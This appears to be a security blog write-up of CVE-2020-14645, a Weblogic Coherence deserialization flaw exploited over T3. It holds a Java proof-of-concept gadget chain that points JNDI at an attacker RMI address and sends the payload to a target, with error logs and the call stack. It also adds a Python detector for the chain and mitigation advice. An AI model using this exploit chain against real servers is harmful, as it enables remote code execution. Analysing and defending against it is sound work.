[CVE-2020-14645] Weblogic Coherence deserialization RCE via T3

The impact is limited; after all, not many deployments run 12.2.1.4.

Affected versions:

  • Weblogic 12.2.1.4.x
    The class com.tangosol.util.extractor.UniversalExtractor is specific to the Coherence component shipped with Weblogic 12.2.1.4.0, so only Weblogic 12.2.1.4.x is affected.

  • JDK < 6u211 / 7u201 / 8u191
    The sink is JNDI injection, so only JDK versions before JEP 290 are affected.

Demo (screenshots not reproduced)

Weblogic error message:

(Wrapped: com.sun.rowset.JdbcRowSetImpl.databaseMetaData(com.sun.rowset.JdbcRowSetImpl@6e9f27dc)) java.lang.reflect.InvocationTargetException
        at com.tangosol.util.Base.ensureRuntimeException(Base.java:324)
        at com.tangosol.util.extractor.UniversalExtractor.extract(UniversalExtractor.java:183)
        at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
        at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
        at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
        Truncated. see log file for complete stacktrace
Caused By: java.lang.reflect.InvocationTargetException
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at com.tangosol.util.extractor.UniversalExtractor.extractComplex(UniversalExtractor.java:432)
        Truncated. see log file for complete stacktrace
Caused By: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
        at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
        at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        Truncated. see log file for complete stacktrace

PoC (rmiAddress, target, Port and SSL are variables set elsewhere; Reflections, Serializables and T3ProtocolOperation are helper classes not shown):

        UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()");
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        Class clazz1 = JdbcRowSetImpl.class.getSuperclass();
        Field dataSource = clazz1.getDeclaredField("dataSource");
        dataSource.setAccessible(true);
        dataSource.set(jdbcRowSet, rmiAddress);
        ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);

        PriorityQueue queue = new PriorityQueue(2);

        queue.add("1");
        queue.add("1");

        Class ext = PriorityQueue.class;
        Field comparator = ext.getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(queue, extractorComparator);

        Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = jdbcRowSet;

        byte[] payload = Serializables.serialize(queue);

        T3ProtocolOperation.send(target, Port, SSL, payload);

The call stack is:

getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:722, PriorityQueue (java.util)
siftDown:688, PriorityQueue (java.util)
heapify:737, PriorityQueue (java.util)
readObject:797, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1158, ObjectStreamClass (java.io)
readSerialData:2176, ObjectInputStream (java.io)
readOrdinaryObject:2067, ObjectInputStream (java.io)
readObject0:1571, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:73, InboundMsgAbbrev (weblogic.rjvm)
read:45, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:325, MsgAbbrevJVMConnection (weblogic.rjvm)
init:219, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:557, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:666, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:397, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:993, SocketMuxer (weblogic.socket)
readReadySocket:929, SocketMuxer (weblogic.socket)
process:599, NIOSocketMuxer (weblogic.socket)
processSockets:563, NIOSocketMuxer (weblogic.socket)
run:30, SocketReaderRequest (weblogic.socket)
execute:43, SocketReaderRequest (weblogic.socket)
execute:147, ExecuteThread (weblogic.kernel)
run:119, ExecuteThread (weblogic.kernel)
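As an added detection example (my code, not from the post or the referenced PoC repositories), the following Python scans a captured T3 message for the Java serialization class descriptors of the chain above and flags the Coherence extractor/comparator and JdbcRowSetImpl. The sample streams are constructed, and the "<t3 framing>" prefix is a placeholder for the real T3 message bytes.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization header
TC_CLASSDESC = 0x72                 # tag that precedes a class name in the stream
# Classes making up the chain in the PoC above; PriorityQueue on its own is benign.
GADGET_CLASSES = {
    "java.util.PriorityQueue",
    "com.tangosol.util.comparator.ExtractorComparator",
    "com.tangosol.util.extractor.UniversalExtractor",
    "com.sun.rowset.JdbcRowSetImpl",
}
_CLASS_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

def class_descriptors(data: bytes):
    """Yield class names from TC_CLASSDESC records (tag, 2-byte length, name);
    a heuristic scan from the first stream magic, not a full parser."""
    i = data.find(STREAM_MAGIC)
    if i < 0:
        return
    i += len(STREAM_MAGIC)
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            length = struct.unpack_from(">H", data, i + 1)[0]
            name = data[i + 3:i + 3 + length]
            if 0 < length <= 200 and len(name) == length and _CLASS_NAME.match(name):
                yield name.decode("ascii")
                i += 3 + length
                continue
        i += 1

def find_gadget_classes(data: bytes) -> list:
    """Sorted chain classes whose descriptors appear in the stream."""
    return sorted(set(class_descriptors(data)) & GADGET_CLASSES)

def is_cve_2020_14645_chain(data: bytes) -> bool:
    """True if a Coherence extractor/comparator or JdbcRowSetImpl descriptor is present."""
    return bool(set(find_gadget_classes(data)) - {"java.util.PriorityQueue"})

def _desc(name: bytes) -> bytes:
    # Constructed TC_CLASSDESC prefix; the rest of the record is omitted in the samples.
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name

# Constructed sample streams (not real captures): a plain PriorityQueue and the chain.
SAMPLE_BENIGN = STREAM_MAGIC + b"\x73" + _desc(b"java.util.PriorityQueue") + b"\x00" * 8
SAMPLE_CHAIN = (b"<t3 framing>" + STREAM_MAGIC + b"\x73" + _desc(b"java.util.PriorityQueue")
                + _desc(b"com.tangosol.util.comparator.ExtractorComparator")
                + _desc(b"com.tangosol.util.extractor.UniversalExtractor")
                + _desc(b"com.sun.rowset.JdbcRowSetImpl"))
```

Matching class descriptors on the wire is only a network-side tell; the durable fix is patching plus a server-side deserialization filter that denies the Coherence extractor/comparator classes and com.sun.rowset.JdbcRowSetImpl.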

References

  • https://www.cnblogs.com/potatsoSec/p/13307315.html
  • https://www.anquanke.com/post/id/210724
  • https://github.com/Y4er/CVE-2020-14645
  • https://github.com/DaBoQuan/CVE-2020-14645

Origin: blog.csdn.net/caiqiiqi/article/details/107468422